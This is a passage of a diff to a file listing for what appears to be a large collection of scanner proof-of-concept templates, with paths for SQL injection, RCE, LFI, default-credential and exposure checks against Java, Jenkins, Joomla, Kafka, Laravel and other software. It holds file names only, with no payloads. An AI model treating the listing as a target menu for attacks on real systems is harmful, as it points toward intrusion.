./poc/injection/viewlinc-crlf-injection-11012.yaml ./poc/injection/viewlinc-crlf-injection-11013.yaml -./poc/injection/viewlinc-crlf-injection-11014.yaml ./poc/injection/viewlinc-crlf-injection-11015.yaml ./poc/injection/viewlinc-crlf-injection.yaml ./poc/injection/weiphp-sql-injection-11190.yaml @@ -47402,6 +47403,7 @@ ./poc/injection/xmlinputfactory_xxeinjection.yaml ./poc/injection/xmlreader_xxeinjection.yaml ./poc/injection/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml +./poc/injection/yongyou-u8-RegisterServlet-sql-Injection.yaml ./poc/injection/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml ./poc/injection/yonyou-nc-registerservlet-jndi-injection.yaml ./poc/injection/yuantian-oa-getdata-action-sql-injection.yaml @@ -47452,6 +47454,7 @@ ./poc/java/apache-tomcat-cve-2022-34305.yaml ./poc/java/apache-tomcat-snoop-374.yaml ./poc/java/apache-tomcat-snoop-376.yaml +./poc/java/apache-tomcat-snoop-377.yaml ./poc/java/apache-tomcat-snoop-cookie-handling.yaml ./poc/java/apache-tomcat-snoop-ip-disclosure.yaml ./poc/java/apache-tomcat-snoop.yaml @@ -47480,7 +47483,6 @@ ./poc/java/custom-jreport-admin-creds.yaml ./poc/java/custom-mapview-jsp-detect.yaml ./poc/java/custom-weblogic-SSRF-detect.yaml -./poc/java/default-glassfish-server-page-6852.yaml ./poc/java/default-glassfish-server-page-6853.yaml ./poc/java/default-glassfish-server-page-6854.yaml ./poc/java/default-glassfish-server-page-6855.yaml @@ -47494,6 +47496,7 @@ ./poc/java/detect-springboot-actuator.yaml ./poc/java/e-cology-springframework-directory-traversal.yaml ./poc/java/ecology-javabeanshell-rce.yaml +./poc/java/ecology-springframework-directory-traversal-7174.yaml ./poc/java/ecology-springframework-directory-traversal-7175.yaml ./poc/java/ecology-springframework-directory-traversal.yml ./poc/java/ecology-springframework-directoryTraversal.yaml @@ -47501,7 +47504,7 @@ ./poc/java/exposed-alps-spring-2.yaml ./poc/java/exposed-alps-spring-3.yaml ./poc/java/exposed-alps-spring-7283.yaml -./poc/java/exposed-alps-spring-7284.yaml +./poc/java/exposed-alps-spring-7285.yaml ./poc/java/exposed-alps-spring.yaml ./poc/java/exposed-struts.yaml ./poc/java/facemeeting-struts2-rce.yaml @@ -47521,6 +47524,7 @@ ./poc/java/java-melody-exposed-2.yaml ./poc/java/java-melody-exposed-8221.yaml ./poc/java/java-melody-exposed-8222.yaml +./poc/java/java-melody-exposed-8223.yaml ./poc/java/java-melody-exposed-8224.yaml ./poc/java/java-melody-stat.yaml ./poc/java/java-melody-xss-8225.yaml @@ -47547,10 +47551,11 @@ ./poc/java/jboss-jbpm-admin.yaml ./poc/java/jboss-juddi.yaml ./poc/java/jboss-seam-debug-page-8238.yaml -./poc/java/jboss-seam-debug-page-8239.yaml +./poc/java/jboss-seam-debug-page-8240.yaml ./poc/java/jboss-seam-debug-page.yaml ./poc/java/jboss-soa-platform.yaml ./poc/java/jboss-ssrf.yaml +./poc/java/jboss-status-8241.yaml ./poc/java/jboss-status-8242.yaml ./poc/java/jboss-status-8243.yaml ./poc/java/jboss-unauth.yml @@ -47561,10 +47566,11 @@ ./poc/java/jetty-information-disclosure.yaml ./poc/java/jetty-showcontexts-enable-8295.yaml ./poc/java/jetty-showcontexts-enable-8296.yaml +./poc/java/jetty-showcontexts-enable-8297.yaml +./poc/java/jetty-showcontexts-enable-8298.yaml ./poc/java/jetty-showcontexts-enable.yaml ./poc/java/jetty-workflow.yaml ./poc/java/jetty.yaml -./poc/java/jinfornet-jreport-lfi-8307.yaml ./poc/java/jinfornet-jreport-lfi-8308.yaml ./poc/java/jinfornet-jreport-lfi-8309.yaml ./poc/java/jinfornet-jreport-lfi-8310.yaml @@ -47607,8 +47613,8 @@ ./poc/java/shiro-124-rememberme.yaml ./poc/java/shiro-deserialization-detection.yaml ./poc/java/shiro-detect-10195.yaml +./poc/java/shiro-detect-10196.yaml ./poc/java/shiro-detect-10197.yaml -./poc/java/shiro-detect.yaml ./poc/java/spring-boot-admin.yaml ./poc/java/spring-cloud-cve-2020-5405.yml ./poc/java/spring-cloud-cve-2020-5410.yml @@ -47624,6 +47630,7 @@ ./poc/java/spring_collection.yaml ./poc/java/springboot-actuator-1.yaml ./poc/java/springboot-actuator-10433.yaml +./poc/java/springboot-actuator-10434.yaml ./poc/java/springboot-actuator-10435.yaml ./poc/java/springboot-actuator-2.yaml ./poc/java/springboot-actuator-unauth.yaml @@ -47638,23 +47645,22 @@ ./poc/java/springboot-autoconfig-1.yaml ./poc/java/springboot-autoconfig-10437.yaml ./poc/java/springboot-autoconfig-2.yaml -./poc/java/springboot-autoconfig.yaml ./poc/java/springboot-beans-1.yaml -./poc/java/springboot-beans-10438.yaml +./poc/java/springboot-beans-10439.yaml ./poc/java/springboot-beans-10440.yaml ./poc/java/springboot-beans-10441.yaml ./poc/java/springboot-beans-2.yaml ./poc/java/springboot-conditions.yaml ./poc/java/springboot-configprops-1.yaml ./poc/java/springboot-configprops-10442.yaml -./poc/java/springboot-configprops-10443.yaml +./poc/java/springboot-configprops-10444.yaml ./poc/java/springboot-configprops-10445.yaml ./poc/java/springboot-configprops-2.yaml ./poc/java/springboot-detect.yaml ./poc/java/springboot-dump-1.yaml ./poc/java/springboot-dump-10446.yaml -./poc/java/springboot-dump-10447.yaml ./poc/java/springboot-dump-2.yaml +./poc/java/springboot-dump.yaml ./poc/java/springboot-env-1.yaml ./poc/java/springboot-env-10448.yaml ./poc/java/springboot-env-10449.yaml @@ -47665,28 +47671,26 @@ ./poc/java/springboot-env-unauth.yml ./poc/java/springboot-exposures.yaml ./poc/java/springboot-features.yaml -./poc/java/springboot-gateway-10452.yaml +./poc/java/springboot-gateway-10453.yaml ./poc/java/springboot-gateway.yaml -./poc/java/springboot-h2-db-rce-10454.yaml +./poc/java/springboot-h2-db-rce-10455.yaml ./poc/java/springboot-h2-db-rce-10456.yaml ./poc/java/springboot-h2-db-rce-10457.yaml ./poc/java/springboot-h2-db-rce-10458.yaml -./poc/java/springboot-h2-db-rce.yaml ./poc/java/springboot-health-1.yaml ./poc/java/springboot-health-10459.yaml ./poc/java/springboot-health-10460.yaml ./poc/java/springboot-health-2.yaml ./poc/java/springboot-heapdump-1.yaml +./poc/java/springboot-heapdump-10461.yaml ./poc/java/springboot-heapdump-10462.yaml ./poc/java/springboot-heapdump-10463.yaml ./poc/java/springboot-heapdump-10464.yaml -./poc/java/springboot-heapdump-10465.yaml ./poc/java/springboot-heapdump-2.yaml ./poc/java/springboot-heapdump-v2.yaml ./poc/java/springboot-httptrace-1.yaml ./poc/java/springboot-httptrace-10466.yaml ./poc/java/springboot-httptrace-10467.yaml -./poc/java/springboot-httptrace-10468.yaml ./poc/java/springboot-httptrace-10469.yaml ./poc/java/springboot-httptrace-2.yaml ./poc/java/springboot-info-10470.yaml @@ -47694,7 +47698,6 @@ ./poc/java/springboot-log4j-rce-10472.yaml ./poc/java/springboot-log4j-rce-10473.yaml ./poc/java/springboot-log4j-rce-10474.yaml -./poc/java/springboot-log4j-rce.yaml ./poc/java/springboot-logfile.yaml ./poc/java/springboot-loggers-1.yaml ./poc/java/springboot-loggers-10475.yaml @@ -47707,6 +47710,7 @@ ./poc/java/springboot-mappings-10480.yaml ./poc/java/springboot-mappings-2.yaml ./poc/java/springboot-metrics-1.yaml +./poc/java/springboot-metrics-10482.yaml ./poc/java/springboot-metrics-10483.yaml ./poc/java/springboot-metrics-2.yaml ./poc/java/springboot-pwner-workflow.yaml @@ -47735,6 +47739,7 @@ ./poc/java/struts-debug-mode-10560.yaml ./poc/java/struts-debug-mode.yaml ./poc/java/struts-problem-report-10562.yaml +./poc/java/struts-problem-report-10563.yaml ./poc/java/struts-problem-report-10564.yaml ./poc/java/struts2_001.yaml ./poc/java/sun-glassfish.yaml @@ -47777,7 +47782,6 @@ ./poc/java/tomcat-manager-default-creds.yaml ./poc/java/tomcat-manager-default.yaml ./poc/java/tomcat-manager-pathnormalization-1.yaml -./poc/java/tomcat-manager-pathnormalization-10796.yaml ./poc/java/tomcat-manager-pathnormalization-10797.yaml ./poc/java/tomcat-manager-pathnormalization-2.yaml ./poc/java/tomcat-manager-pathnormalization.yaml @@ -47790,6 +47794,7 @@ ./poc/java/tomcat-scripts-1.yaml ./poc/java/tomcat-scripts-10801.yaml ./poc/java/tomcat-scripts-10802.yaml +./poc/java/tomcat-scripts-10803.yaml ./poc/java/tomcat-scripts-2.yaml ./poc/java/tomcat-scripts-3.yaml ./poc/java/tomcat-scripts-4.yaml @@ -47839,7 +47844,6 @@ ./poc/java/weblogic-weak-login-11154.yaml ./poc/java/weblogic-weak-login-11155.yaml ./poc/java/weblogic-weak-login-11156.yaml -./poc/java/weblogic-weak-login.yaml ./poc/java/weblogic-workflow-11157.yaml ./poc/java/weblogic-workflow.yaml ./poc/java/websphere-portal-preauth-ssrf.yaml @@ -47882,6 +47886,7 @@ ./poc/javascript/VC-opr_copycode_jsp-SQLi.yaml ./poc/javascript/add-custom-css-and-js-1aa54d0c3f88c0268db513e4b2afc065.yaml ./poc/javascript/add-custom-css-and-js.yaml +./poc/javascript/aem-querybuilder-json-servlet-182.yaml ./poc/javascript/aem-querybuilder-json-servlet-183.yaml ./poc/javascript/aem-querybuilder-json-servlet-184.yaml ./poc/javascript/aem-querybuilder-json-servlet-185.yaml @@ -47904,6 +47909,7 @@ ./poc/javascript/auth-json.yaml ./poc/javascript/azuredeploy-json.yaml ./poc/javascript/bower-json-768.yaml +./poc/javascript/bower-json-769.yaml ./poc/javascript/bower-json-770.yaml ./poc/javascript/composer-auth-json.yaml ./poc/javascript/config-js.yaml @@ -47943,6 +47949,7 @@ ./poc/javascript/enigma-chartjs-eddbc3a06b66071ffc106682eef00a39.yaml ./poc/javascript/enigma-chartjs.yaml ./poc/javascript/exposed-env-js.yaml +./poc/javascript/express-lfr-json (copy 1).yaml ./poc/javascript/express-lfr-json.yaml ./poc/javascript/expressjs.yaml ./poc/javascript/fanruan-finereport-v8-getgeojson-fileread.yaml @@ -47953,6 +47960,7 @@ ./poc/javascript/fastjson-1-2-41-rce-7401.yaml ./poc/javascript/fastjson-1-2-41-rce-7403.yaml ./poc/javascript/fastjson-1-2-41-rce-7404.yaml +./poc/javascript/fastjson-1-2-41-rce.yaml ./poc/javascript/fastjson-1-2-42-rce-7405.yaml ./poc/javascript/fastjson-1-2-42-rce-7407.yaml ./poc/javascript/fastjson-1-2-42-rce-7408.yaml @@ -47960,6 +47968,7 @@ ./poc/javascript/fastjson-1-2-43-rce-7411.yaml ./poc/javascript/fastjson-1-2-43-rce-7412.yaml ./poc/javascript/fastjson-1-2-47-rce-7413.yaml +./poc/javascript/fastjson-1-2-47-rce-7415.yaml ./poc/javascript/fastjson-1-2-47-rce-7416.yaml ./poc/javascript/fastjson-1-2-62-rce-7417.yaml ./poc/javascript/fastjson-1-2-62-rce-7419.yaml @@ -47967,10 +47976,10 @@ ./poc/javascript/fastjson-1-2-67-rce-7421.yaml ./poc/javascript/fastjson-1-2-67-rce-7423.yaml ./poc/javascript/fastjson-1-2-67-rce-7424.yaml +./poc/javascript/fastjson-1-2-67-rce.yaml ./poc/javascript/fastjson-1-2-68-rce-1.yaml ./poc/javascript/fastjson-1-2-68-rce-2.yaml ./poc/javascript/fastjson-1-2-68-rce-3.yaml -./poc/javascript/fastjson-1-2-68-rce-7425.yaml ./poc/javascript/fastjson-1-2-68-rce.yaml ./poc/javascript/fastjson-1-7402.yaml ./poc/javascript/fastjson-1-7406.yaml @@ -48121,6 +48130,7 @@ ./poc/javascript/jwks-json.yaml ./poc/javascript/keycloak-json-8471.yaml ./poc/javascript/keycloak-json-8472.yaml +./poc/javascript/keycloak-json-8473.yaml ./poc/javascript/keycloak-json-8474.yaml ./poc/javascript/keys-js.yaml ./poc/javascript/knight-lab-timelinejs-0f42e86470e92d725c0f62d2c358c29e.yaml @@ -48148,8 +48158,8 @@ ./poc/javascript/package-json-1.yaml ./poc/javascript/package-json-2.yaml ./poc/javascript/package-json-9421.yaml -./poc/javascript/package-json-9422.yaml ./poc/javascript/package-json-9423.yaml +./poc/javascript/package-json.yaml ./poc/javascript/pdfjs-viewer-shortcode-901f07b1c8adb20b4d89c03c0e4b0f6e.yaml ./poc/javascript/pdfjs-viewer-shortcode-a8f0b32d7cfb6af435cac07ab61c5de1.yaml ./poc/javascript/pdfjs-viewer-shortcode.yaml @@ -48222,15 +48232,16 @@ ./poc/jenkins/jenkins-asyncpeople-8266.yaml ./poc/jenkins/jenkins-asyncpeople-8267.yaml ./poc/jenkins/jenkins-asyncpeople-8268.yaml +./poc/jenkins/jenkins-asyncpeople-8269.yaml ./poc/jenkins/jenkins-asyncpeople.yaml ./poc/jenkins/jenkins-audit-trail-xss.yaml ./poc/jenkins/jenkins-credentials-disclosure.yml ./poc/jenkins/jenkins-cve-2018-1000600.yml ./poc/jenkins/jenkins-cve-2018-1000861-rce.yml ./poc/jenkins/jenkins-default-8270.yaml -./poc/jenkins/jenkins-default-8271.yaml ./poc/jenkins/jenkins-default-8272.yaml ./poc/jenkins/jenkins-default-8273.yaml +./poc/jenkins/jenkins-default-login.yaml ./poc/jenkins/jenkins-default-pwd.yaml ./poc/jenkins/jenkins-detect-8274.yaml ./poc/jenkins/jenkins-detect-8276.yaml @@ -48238,8 +48249,8 @@ ./poc/jenkins/jenkins-exposed.yaml ./poc/jenkins/jenkins-headers-detect.yaml ./poc/jenkins/jenkins-home-dir-exposure.yaml -./poc/jenkins/jenkins-login-8277.yaml ./poc/jenkins/jenkins-login-8278.yaml +./poc/jenkins/jenkins-login-8279.yaml ./poc/jenkins/jenkins-login-8280.yaml ./poc/jenkins/jenkins-login-detection.yaml ./poc/jenkins/jenkins-login.yaml @@ -48302,14 +48313,16 @@ ./poc/joomla/joomla-component-vreview-sql.yml ./poc/joomla/joomla-config-dist-file.yaml ./poc/joomla/joomla-config-file-8374.yaml -./poc/joomla/joomla-config-file-8375.yaml +./poc/joomla/joomla-config-file-8376.yaml ./poc/joomla/joomla-config-file-8377.yaml +./poc/joomla/joomla-config-file.yaml ./poc/joomla/joomla-cve-2015-7297-sqli.yml ./poc/joomla/joomla-cve-2017-8917-sqli.yml ./poc/joomla/joomla-cve-2018-7314-sql.yml ./poc/joomla/joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml ./poc/joomla/joomla-file-listing-8378.yaml ./poc/joomla/joomla-file-listing-8380.yaml +./poc/joomla/joomla-file-listing.yaml ./poc/joomla/joomla-host-injection.yaml ./poc/joomla/joomla-htaccess-8381.yaml ./poc/joomla/joomla-htaccess-8382.yaml @@ -48346,18 +48359,18 @@ ./poc/joomla/rusty-joomla-9955.yaml ./poc/kafka/apache-druid-kafka-connect-rce.yaml ./poc/kafka/kafka-center-default-login-8415.yaml +./poc/kafka/kafka-center-default-login-8416.yaml ./poc/kafka/kafka-center-default-login-8417.yaml ./poc/kafka/kafka-center-default-password.yaml ./poc/kafka/kafka-center-login-8418.yaml ./poc/kafka/kafka-center-login.yaml ./poc/kafka/kafka-center.yaml +./poc/kafka/kafka-connect-ui-8420.yaml ./poc/kafka/kafka-connect-ui-8421.yaml ./poc/kafka/kafka-connect-ui-8422.yaml -./poc/kafka/kafka-connect-ui-8423.yaml ./poc/kafka/kafka-connect-ui.yaml -./poc/kafka/kafka-consumer-monitor-8425.yaml +./poc/kafka/kafka-consumer-monitor-8424.yaml ./poc/kafka/kafka-consumer-monitor.yaml -./poc/kafka/kafka-cruise-control-8426.yaml ./poc/kafka/kafka-cruise-control-8427.yaml ./poc/kafka/kafka-cruise-control.yaml ./poc/kafka/kafka-manager-unauth.yml @@ -48365,11 +48378,11 @@ ./poc/kafka/kafka-misconfig.yaml ./poc/kafka/kafka-monitoring-8428.yaml ./poc/kafka/kafka-monitoring-8429.yaml -./poc/kafka/kafka-monitoring-8430.yaml +./poc/kafka/kafka-monitoring-8431.yaml ./poc/kafka/kafka-monitoring.yaml -./poc/kafka/kafka-topics-ui-8432.yaml ./poc/kafka/kafka-topics-ui-8433.yaml ./poc/kafka/kafka-topics-ui-8434.yaml +./poc/kafka/kafka-topics-ui-8435.yaml ./poc/kafka/kafka-topics-ui.yaml ./poc/kafka/kafka-ui.yaml ./poc/kafka/kafkaoffsetmonitor.yaml @@ -48417,8 +48430,8 @@ ./poc/laravel/laravel-env.yaml ./poc/laravel/laravel-filemanager-8590.yaml ./poc/laravel/laravel-filemanager-lfi-8587.yaml +./poc/laravel/laravel-filemanager-lfi-8588.yaml ./poc/laravel/laravel-filemanager-lfi-8589.yaml -./poc/laravel/laravel-filemanager-lfi.yaml ./poc/laravel/laravel-filemanager.yaml ./poc/laravel/laravel-framework.yaml ./poc/laravel/laravel-ignition-xss-8592.yaml @@ -48431,6 +48444,7 @@ ./poc/laravel/laravel-log-file-8598.yaml ./poc/laravel/laravel-telescope-8599.yaml ./poc/laravel/laravel-telescope-8600.yaml +./poc/laravel/laravel-telescope-8601.yaml ./poc/laravel/laravel-telescope-exposed.yaml ./poc/laravel/laravel-telescope.yaml ./poc/laravel/laravel-workflow.yaml @@ -48477,7 +48491,6 @@ ./poc/local_file_inclusion/0xlfi2.yaml ./poc/local_file_inclusion/0xlfi3.yaml ./poc/local_file_inclusion/0xlfifuzz.yaml -./poc/local_file_inclusion/0xlfifuzz1.yaml ./poc/local_file_inclusion/Bitrix_LFI.yaml ./poc/local_file_inclusion/E_bridge-lfi-saveYZJFile.yaml ./poc/local_file_inclusion/Joomla-lfi-com_joomanager.yaml @@ -48493,9 +48506,10 @@ ./poc/local_file_inclusion/Wordpress-OPS_Old_Post_Spinner_Plugins-LFI.yaml ./poc/local_file_inclusion/Wordpress-Photocart_Link_Plugins-LFI.yaml ./poc/local_file_inclusion/Wordpress-jQuery_Mega_Menu_Plugins-LFI.yaml -./poc/local_file_inclusion/accent-microcomputers-lfi-14.yaml ./poc/local_file_inclusion/accent-microcomputers-lfi-15.yaml ./poc/local_file_inclusion/accent-microcomputers-lfi-16.yaml +./poc/local_file_inclusion/accent-microcomputers-lfi-17.yaml +./poc/local_file_inclusion/ad-widget-lfi-124.yaml ./poc/local_file_inclusion/ad-widget-lfi-125.yaml ./poc/local_file_inclusion/ad-widget-lfi-126.yaml ./poc/local_file_inclusion/admin-word-count-column-lfi.yaml @@ -48504,44 +48518,46 @@ ./poc/local_file_inclusion/advanced-access-manager-plugin-lfi.yaml ./poc/local_file_inclusion/alertlist-lfi.yaml ./poc/local_file_inclusion/alibaba-anyproxy-lfi.yaml -./poc/local_file_inclusion/amministrazione-aperta-lfi-303.yaml +./poc/local_file_inclusion/amministrazione-aperta-lfi.yaml ./poc/local_file_inclusion/apachesolrlfissrf.yaml ./poc/local_file_inclusion/asanhamayesh-cms-lfi.yaml ./poc/local_file_inclusion/asanhamayesh-lfi-553.yaml +./poc/local_file_inclusion/bems-api-lfi-707.yaml ./poc/local_file_inclusion/bems-api-lfi-708.yaml ./poc/local_file_inclusion/bems-api-lfi-709.yaml ./poc/local_file_inclusion/bems-api-lfi-710.yaml -./poc/local_file_inclusion/bems-api-lfi-711.yaml +./poc/local_file_inclusion/bems-api-lfi-712.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-755.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-757.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml +./poc/local_file_inclusion/brandfolder-lfi-776.yaml ./poc/local_file_inclusion/brandfolder-lfi-777.yaml ./poc/local_file_inclusion/brandfolder-lfi-778.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-804.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-805.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-807.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml +./poc/local_file_inclusion/bullwark-momentum-lfi.yaml ./poc/local_file_inclusion/cab-fare-calculator-lfi-819.yaml ./poc/local_file_inclusion/cab-fare-calculator-lfi.yaml -./poc/local_file_inclusion/candidate-application-lfi-850.yaml ./poc/local_file_inclusion/candidate-application-lfi.yaml -./poc/local_file_inclusion/cherry-lfi-902.yaml ./poc/local_file_inclusion/cherry-lfi-903.yaml +./poc/local_file_inclusion/cherry-lfi.yaml ./poc/local_file_inclusion/church-admin-lfi-912.yaml ./poc/local_file_inclusion/church-admin-lfi-913.yaml -./poc/local_file_inclusion/churchope-lfi-916.yaml -./poc/local_file_inclusion/churchope-lfi.yaml +./poc/local_file_inclusion/church-admin-lfi-914.yaml +./poc/local_file_inclusion/churchope-lfi-915.yaml ./poc/local_file_inclusion/coldfusion-cve-2010-2861-lfi.yml ./poc/local_file_inclusion/comfyui-lfi.yaml ./poc/local_file_inclusion/confluence-cve-2019-3396-lfi.yaml ./poc/local_file_inclusion/confluence-cve-2019-3396-lfi.yml ./poc/local_file_inclusion/crawlab-lfi.yaml ./poc/local_file_inclusion/crystal-live-http-server-lfi.yaml +./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1281.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1282.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1283.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1284.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1285.yaml -./poc/local_file_inclusion/cs-cart-unauthenticated-lfi.yaml ./poc/local_file_inclusion/dahua-icc-readPic-lfi.yaml ./poc/local_file_inclusion/db-backup-lfi-6774.yaml ./poc/local_file_inclusion/db-backup-lfi-6776.yaml @@ -48549,10 +48565,8 @@ ./poc/local_file_inclusion/diarise-theme-lfi-6990.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6991.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6992.yaml -./poc/local_file_inclusion/dicoogle-pacs-lfi-6993.yaml ./poc/local_file_inclusion/dicoogle-pacs-lfi-6994.yaml ./poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml -./poc/local_file_inclusion/dicoogle-pacs-lfi.yaml ./poc/local_file_inclusion/drupal-7-elfinder.yaml ./poc/local_file_inclusion/easyimage-downphp-lfi.yaml ./poc/local_file_inclusion/ecoa-building-lfi.yaml @@ -48566,6 +48580,7 @@ ./poc/local_file_inclusion/elfinder-detect-2.yaml ./poc/local_file_inclusion/elfinder-detect-7201.yaml ./poc/local_file_inclusion/elfinder-detect-7202.yaml +./poc/local_file_inclusion/elfinder-path-traversal-7203.yaml ./poc/local_file_inclusion/elfinder-path-traversal.yaml ./poc/local_file_inclusion/elfinder-rce.yaml ./poc/local_file_inclusion/elfinder-version-7204.yaml @@ -48581,7 +48596,6 @@ ./poc/local_file_inclusion/generic-linux-lfi-7589.yaml ./poc/local_file_inclusion/generic-linux-lfi.yaml ./poc/local_file_inclusion/generic-windows-lfi-7590.yaml -./poc/local_file_inclusion/generic-windows-lfi-7591.yaml ./poc/local_file_inclusion/generic-windows-lfi-7592.yaml ./poc/local_file_inclusion/generic-windows-lfi.yaml ./poc/local_file_inclusion/geovision-geowebserver-lfi-1.yaml @@ -48593,19 +48607,16 @@ ./poc/local_file_inclusion/global-domains-lfi-7714.yaml ./poc/local_file_inclusion/global-domains-lfi-7715.yaml ./poc/local_file_inclusion/global-domains-lfi-7716.yaml -./poc/local_file_inclusion/global-domains-lfi.yaml ./poc/local_file_inclusion/goip-1-lfi-7761.yaml ./poc/local_file_inclusion/goip-1-lfi-7762.yaml ./poc/local_file_inclusion/goip-1-lfi-7763.yaml -./poc/local_file_inclusion/goip-1-lfi-7764.yaml -./poc/local_file_inclusion/groupoffice-lfi-7850.yaml +./poc/local_file_inclusion/groupoffice-lfi-7849.yaml ./poc/local_file_inclusion/groupoffice-lfi-7851.yaml ./poc/local_file_inclusion/gsoap-lfi-7853.yaml ./poc/local_file_inclusion/gsoap-lfi-7854.yaml ./poc/local_file_inclusion/gsoap-lfi-7855.yaml ./poc/local_file_inclusion/gsoap-lfi-7856.yaml ./poc/local_file_inclusion/gsoap-lfi-7857.yaml -./poc/local_file_inclusion/gsoap-lfi.yaml ./poc/local_file_inclusion/hb-audio-lfi-7911.yaml ./poc/local_file_inclusion/hb-audio-lfi-7912.yaml ./poc/local_file_inclusion/hb-audio-lfi-7913.yaml @@ -48615,9 +48626,9 @@ ./poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml ./poc/local_file_inclusion/hide-security-enhancer-lfi-7953.yaml ./poc/local_file_inclusion/hjsoft-eHR-outputcode-lfi.yaml +./poc/local_file_inclusion/hrsale-unauthenticated-lfi-8039.yaml ./poc/local_file_inclusion/hrsale-unauthenticated-lfi-8040.yaml ./poc/local_file_inclusion/hrsale-unauthenticated-lfi-8041.yaml -./poc/local_file_inclusion/hrsale-unauthenticated-lfi.yaml ./poc/local_file_inclusion/huawei-firewall-lfi.yaml ./poc/local_file_inclusion/huawei-hg255s-lfi-8059.yaml ./poc/local_file_inclusion/huawei-hg255s-lfi-8060.yaml @@ -48625,6 +48636,7 @@ ./poc/local_file_inclusion/huawei-hg659-lfi-8067.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8068.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8069.yaml +./poc/local_file_inclusion/huawei-hg659-lfi-8070.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8071.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8101.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8102.yaml @@ -48635,13 +48647,13 @@ ./poc/local_file_inclusion/issuu-panel-lfi-8198.yaml ./poc/local_file_inclusion/issuu-panel-lfi-8199.yaml ./poc/local_file_inclusion/issuu-panel-lfi-8200.yaml +./poc/local_file_inclusion/issuu-panel-lfi.yaml ./poc/local_file_inclusion/jeewms-lfi-1.yaml ./poc/local_file_inclusion/jeewms-lfi-2.yaml ./poc/local_file_inclusion/jeewms-lfi-8252.yaml ./poc/local_file_inclusion/jeewms-lfi-8253.yaml ./poc/local_file_inclusion/jeewms-lfi-8254.yaml ./poc/local_file_inclusion/jeewms-lfi-8255.yaml -./poc/local_file_inclusion/jinfornet-jreport-lfi-8307.yaml ./poc/local_file_inclusion/jinfornet-jreport-lfi-8308.yaml ./poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml ./poc/local_file_inclusion/jinfornet-jreport-lfi-8310.yaml @@ -48650,7 +48662,6 @@ ./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8364.yaml ./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8365.yaml ./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8366.yaml -./poc/local_file_inclusion/jolokia-unauthenticated-lfi.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8370.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8371.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8372.yaml @@ -48658,6 +48669,7 @@ ./poc/local_file_inclusion/joomla-lfi-comfabrik.yaml ./poc/local_file_inclusion/karel-ip-phone-lfi-8436.yaml ./poc/local_file_inclusion/karel-ip-phone-lfi-8437.yaml +./poc/local_file_inclusion/karel-ip-phone-lfi-8438.yaml ./poc/local_file_inclusion/karenderia-cms-lfi.yaml ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8557.yaml ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8558.yaml @@ -48666,8 +48678,8 @@ ./poc/local_file_inclusion/lanproxy-cve-2021-3019-lfi.yml ./poc/local_file_inclusion/lanproxy-lfi.yaml ./poc/local_file_inclusion/laravel-filemanager-lfi-8587.yaml +./poc/local_file_inclusion/laravel-filemanager-lfi-8588.yaml ./poc/local_file_inclusion/laravel-filemanager-lfi-8589.yaml -./poc/local_file_inclusion/laravel-filemanager-lfi.yaml ./poc/local_file_inclusion/lfi-00.yaml ./poc/local_file_inclusion/lfi-01.yaml ./poc/local_file_inclusion/lfi-02.yaml @@ -48678,12 +48690,14 @@ ./poc/local_file_inclusion/lfi-fuzz.yaml ./poc/local_file_inclusion/lfi-j2ee.yaml ./poc/local_file_inclusion/lfi-keyed.yaml +./poc/local_file_inclusion/lfi-linux-fuzz.yaml ./poc/local_file_inclusion/lfi-linux.yaml ./poc/local_file_inclusion/lfi-vuln-params.yaml ./poc/local_file_inclusion/lfi-windows.yaml ./poc/local_file_inclusion/lfi.yaml ./poc/local_file_inclusion/lightdash-lfi.yaml ./poc/local_file_inclusion/linux-lfi-fuzz.yaml +./poc/local_file_inclusion/linux-lfi-fuzzing.yaml ./poc/local_file_inclusion/lotus-core-cms-lfi.yaml ./poc/local_file_inclusion/magicflow-lfi-1.yaml ./poc/local_file_inclusion/magicflow-lfi-2.yaml @@ -48691,6 +48705,7 @@ ./poc/local_file_inclusion/magicflow-lfi-8711.yaml ./poc/local_file_inclusion/magicflow-lfi-8712.yaml ./poc/local_file_inclusion/magicflow-lfi-8713.yaml +./poc/local_file_inclusion/magicflow-lfi.yaml ./poc/local_file_inclusion/metinfo-lfi-1.yaml ./poc/local_file_inclusion/metinfo-lfi-2.yaml ./poc/local_file_inclusion/metinfo-lfi-3.yaml @@ -48704,7 +48719,7 @@ ./poc/local_file_inclusion/minimouse-lfi-8879.yaml ./poc/local_file_inclusion/minimouse-lfi-8880.yaml ./poc/local_file_inclusion/minimouse-lfi-8881.yaml -./poc/local_file_inclusion/moodle-filter-jmol-lfi-8938.yaml +./poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi-8939.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi-8940.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi.yaml @@ 